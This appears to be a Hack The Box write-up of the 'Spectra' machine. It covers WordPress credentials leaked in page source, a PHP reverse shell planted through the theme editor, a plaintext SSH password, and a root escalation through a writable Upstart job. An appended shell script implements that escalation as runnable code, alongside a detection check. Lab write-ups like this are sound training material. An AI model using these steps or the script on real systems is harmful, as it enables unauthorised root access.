In this post, I would like to share a walkthrough of the Spectra machine from Hack The Box.


Hack The Box rates this machine as Easy.

Information Gathering on Spectra


Once the VPN connection is up, we start information gathering by running nmap -sC -sV -Pn <IP Address> (the -Pn flag skips host discovery, since the box may not answer pings).


Several ports are open on this machine.


First, we add the machine's IP address to /etc/hosts so that spectra.htb resolves, since the rest of the walkthrough uses that host name.


Let's open the browser and go straight to the website.


There are two links that we can try.


From experience, the site looks like a WordPress install. By default the login page lives at /wp-login.php, and /wp-admin redirects there when you are not logged in.

Gaining Access on Spectra machine


However, I don't have credentials for the username and password yet.


The other link leads to a directory listing containing the files a normal WordPress install uses.


Opening wp-config.php only gives the error "Error establishing a database connection": the PHP executes server-side, so the browser never sees its contents.


Let's move one directory back and see what is stored there. Nothing useful shows up on the rendered page.


Let's check the page source instead.


The source contains a username and password that might be useful.


Let's try that username and password on the WordPress login page.


The credentials are not entirely correct. WordPress returns "Unknown username", which tells us only the username is wrong; the password may still be valid. This is the usual WordPress information leak: the login form gives a different error for a bad username than for a bad password, so valid usernames can be confirmed from the form alone.


Let's run wpscan to enumerate usernames: wpscan --url http://spectra.htb/main -e u


wpscan reports that administrator is a valid username on the site.

Enumerate the WordPress dashboard


Let's try logging in with the username administrator and the password found in the source.


We manage to log in to the WordPress dashboard, as shown above.


Normally, I get a reverse shell through Appearance > Theme Editor by editing the theme's 404.php.


We paste a PHP reverse shell into 404.php, changing the IP address and port to our own.


Checking the nc listener, we still have not received a connection.


We will try a different theme; I will use Twenty Seventeen.


Then we request the edited template directly: http://spectra.htb/main/wp-content/themes/twentyseventeen/404.php


This time the reverse shell connects back to us.


There is usually something interesting hidden in /opt, and autologin.conf.orig looks suspicious.


Reading the file carefully, we notice it refers to the /etc/autologin directory, which is worth a look.


There is a file called passwd saved in that directory.


We get a password, but the file does not say whose it is or what it is for. We still need a username to go with it.


Let's read /etc/passwd to look for a user account we could use.


We find the user katie on the machine. Going back to the nmap output, we check which open ports accept credentials.

Maintaining Access


The ssh service is open, so let's ssh in as katie with the password SummerHereWeCome!!


We are logged in via ssh and can read the user flag with cat user.txt.


I got the user flag and submitted it on the HTB website.

Escalate to Root Privileges Access


Let's look for anything we can run with elevated privileges, such as SUID binaries and commands allowed through sudo.

Source: https://linux.die.net/man/8/initctl

We can run /sbin/initctl. initctl is the control tool for Upstart: it starts and stops jobs defined by the .conf files in /etc/init, and a job's script block runs as root. We should research what the tool can and cannot do before using it.


After some research on the machine, let's look at /etc/init for jobs we can use.


There are a lot of files here.


The file that caught my attention is shown above. Let's see what is written in test.conf.


The screenshot above shows the original contents of the file.


We can stop and start the job with sudo /sbin/initctl stop test and sudo /sbin/initctl start test.


Let's tweak the commands between script and end script so that the job does something useful for us when it runs as root.


Running /bin/bash -p did nothing at first, so we repeat the stop and start step above so that the modified job actually runs.


If all the steps above succeed, we see something like the screenshot above.


After running /bin/bash -p, we can verify our privileges with the id command. We have root when it shows euid=0(root) egid=0(root) groups=0(root).
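The initctl escalation described in the steps above, written as a repeatable script, together with the check a defender would run for the same weakness. This is an added example, not the author's commands or the machine's real test.conf: the job contents are constructed (the page only shows the file in a screenshot), the setuid-on-/bin/bash payload is our choice, and it assumes the job file /etc/init/test.conf is writable by the unprivileged user, which is what makes sudo initctl start a root shell.

```shell
#!/bin/sh
# Added example (not the author's commands): the initctl privilege
# escalation as a script, plus the defender-side check for it.
# Assumptions not stated on the page: the job file is /etc/init/test.conf
# and is writable by the unprivileged user; the payload (setuid bit on
# /bin/bash) is ours. The job body below is constructed, not the real one.

# Upstart job whose 'script ... end script' block runs as root when
# initctl starts it. That block is the part the walkthrough tweaks.
suid_job() {
    cat <<'EOF'
description "constructed example job (not the machine's real test.conf)"

start on filesystem or runlevel [2345]
stop on shutdown

script
    # runs as root: make bash setuid so '/bin/bash -p' keeps euid 0
    chmod u+s /bin/bash
end script
EOF
}

# Defender-side check: report any Upstart job a non-root user could edit.
# A group- or world-writable job combined with 'sudo initctl' on that job
# is a root shell. Prints the offending paths; returns 0 if any are found.
writable_jobs() {
    dir="$1"
    found=1
    for f in "$dir"/*.conf; do
        [ -e "$f" ] || continue
        if [ -n "$(find "$f" -maxdepth 0 \( -perm -g+w -o -perm -o+w \) 2>/dev/null)" ]; then
            echo "$f"
            found=0
        fi
    done
    return $found
}

# Attack sequence as performed on the machine; invoke by hand only.
exploit_initctl() {
    job="${1:-test}"
    suid_job > "/etc/init/${job}.conf"
    sudo /sbin/initctl stop "$job"   # harmless if the job is not running
    sudo /sbin/initctl start "$job"  # executes the script block as root
    ls -l /bin/bash                  # expect an 's' in the mode bits
    exec /bin/bash -p                # -p keeps euid=0 from the setuid bit
}
```

The stop before start matters: initctl will not restart a job that Upstart believes is already running, which is the likely reason the first attempt in the post did nothing. On the defensive side, `writable_jobs /etc/init` is the one-line audit; the fix is to make every job file root-owned and mode 644, and to avoid sudo rules that grant initctl on jobs other users can edit.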


Let's read the root flag stored in /root/ as usual.


-THE END-


Happy Learning Guys!